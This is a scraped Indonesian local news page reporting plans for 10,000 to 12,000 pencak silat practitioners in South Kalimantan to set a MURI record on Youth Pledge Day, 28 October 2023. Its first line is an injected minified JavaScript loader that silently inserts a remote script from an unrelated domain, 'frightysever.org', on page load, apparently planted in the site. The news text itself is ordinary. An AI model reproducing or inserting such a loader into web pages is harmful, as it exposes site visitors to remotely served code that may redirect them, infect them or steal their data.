(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kalimantan Selatan

10 Ribu Pesilat Kalsel Siap Catat Rekor Muri di Hari Sumpah Pemuda


KANALKALIMANTAN.COM, BANJARBARU – Ribuan pesilat di Kalimantan Selatan (Kalsel) sedang dipersiapkan untuk mencatat rekor Museum Rekor Indonesia (Muri) pada Hari Sumpah Pemuda mendatang.

Agenda itu rencananya akan dilaksanakan pada 28 Oktober 2023 atau bertepatan dengan peringatan Hari Sumpah Pemuda, di halaman kantor Setda Provinsi Kalsel, Kota Banjarbaru.

Pemprov Kalsel melalui Dinas Kepemudaan dan Olahraga (Dispora) Kalsel menyiapkan 10 ribu pesilat yang tersebar dari berbagai perguruan silat di Kalsel.

Baca juga: Hujan di Kalsel Mundur dari Normal, Prediksi BMKG November Baru Turun Hujan

“Untuk melakukan pemecahan Museum Rekor Dunia Indonesia (Muri) pada cabang olahraga pencak silat bertepatan dengan peringatan Hari Sumpah Pemuda pada tanggal 28 Oktober 2023,” ujar Kadispora Kalsel melalui Kabid Pembudayaan Olahraga Budiono, Rabu (4/10/2023).

Provinsi Kalsel sendiri, katanya, sudah memiliki 9.200 pesilat yang saat ini sudah tercatat dan telah diutus oleh 13 kabupaten dan kota untuk memecahkan rekor.

Dengan angka yang mendekati sepuluh ribu itu, Dispora akan kembali menambah sebanyak 1.500 pesilat dari Ikatan Pencak Silat Indonesia (IPSI) Banjarmasin dan IPSI Kalsel.

Baca juga: Pokjaluh dan FKPAI Bimbingan Rohani Islam ke Pasien RSUD Pembalah Batung Amuntai

“Kemudian kita juga menambat pesilat dari SKPD lingkungan Pemprov Kalsel yang tercatat ada sekitar 1.000 pegawai, serta akan didukung 500 pesilat dari Lanal dan Korem,” sebut dia.

Total peserta silat yang ditargetkan semula 10.000 pesilat, kini dengan banyaknya dukungan pesilat, maka diprediksi sedikitnya akan hadir sebanyak 12.000 pesilat.

“Untuk itu kami juga sedang menyusun layout dan panggung utama untuk posisi instruktur silat,” ungkapnya.

Baca juga: Spanduk Tak Senonoh di Pagar Masjid Raya Sabilal Muhtadin Banjarmasin

Dirinya pun berharap, dengan pemecahan Rekor Muri ini dapat meningkatkan motivasi masyarakat dalam berolahraga.

Besar harapannya juga untuk menunjukkan eksistensi Banua sebagai pelestarian olahraga tradisional dan budaya yakni dengan olahraga pencak silat.

“Selain olahraga lainnya, sebagai olahraga yang juga mengangkat wisatawan atau sport tourism,” pungkasnya. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Peternakan Babi Dekat Kampus UIN Antasari di Guntung Manggis Dikeluhkan

Pemilik Ternak Diminta Datang ke Kantor Satpol PP Banjarbaru Read More

11 jam ago

Rekayasa Pemasangan ATSC, Jalan Pangeran Suriansyah Steril Parkir dan PKL

KANALKALIMANTAN.COM, BANJARBARU - Kawasan pinggir jalan maupun median di Jalan Pangeran Suriansyah, Kota Banjarbaru, Kalimantan… Read More

12 jam ago

Pj Bupati HSU Resmikan TMMD ke-120 di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Penjabat (Pj) Bupati Hulu Sungai Utara (HSU) Zakly Asswan secara resmi membuka… Read More

13 jam ago

Sekat Bakar Antisipasi Karhutla Ring 1 Bandara Syamsudin Noor

KANALKALIMANTAN.COM, BANJARBARU - Provinsi Kalimantan Selatan kembali memfokuskan penanganan ancaman kebakaran hutan dan lahan (Karhutla)… Read More

14 jam ago

Buaya di Pelambuan Banjarmasin Gagal Ditangkap, Tiga Kali Terlihat Warga Muncul

KANALKALIMANTAN.COM, BANJARMASIN - Kemunculan seekor buaya di kawasan sungai Kelurahan Pelambuan, Kecamatan Banjarmasin Utara, Kota… Read More

17 jam ago

Ambulans Baru Layanan Puskesmas Keliling di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU – Dinas Kesehatan (Dinkes) Kota Banjarbaru hadirkan layanan kesehatan yang lebih dekat dengan… Read More

18 jam ago

This website uses cookies.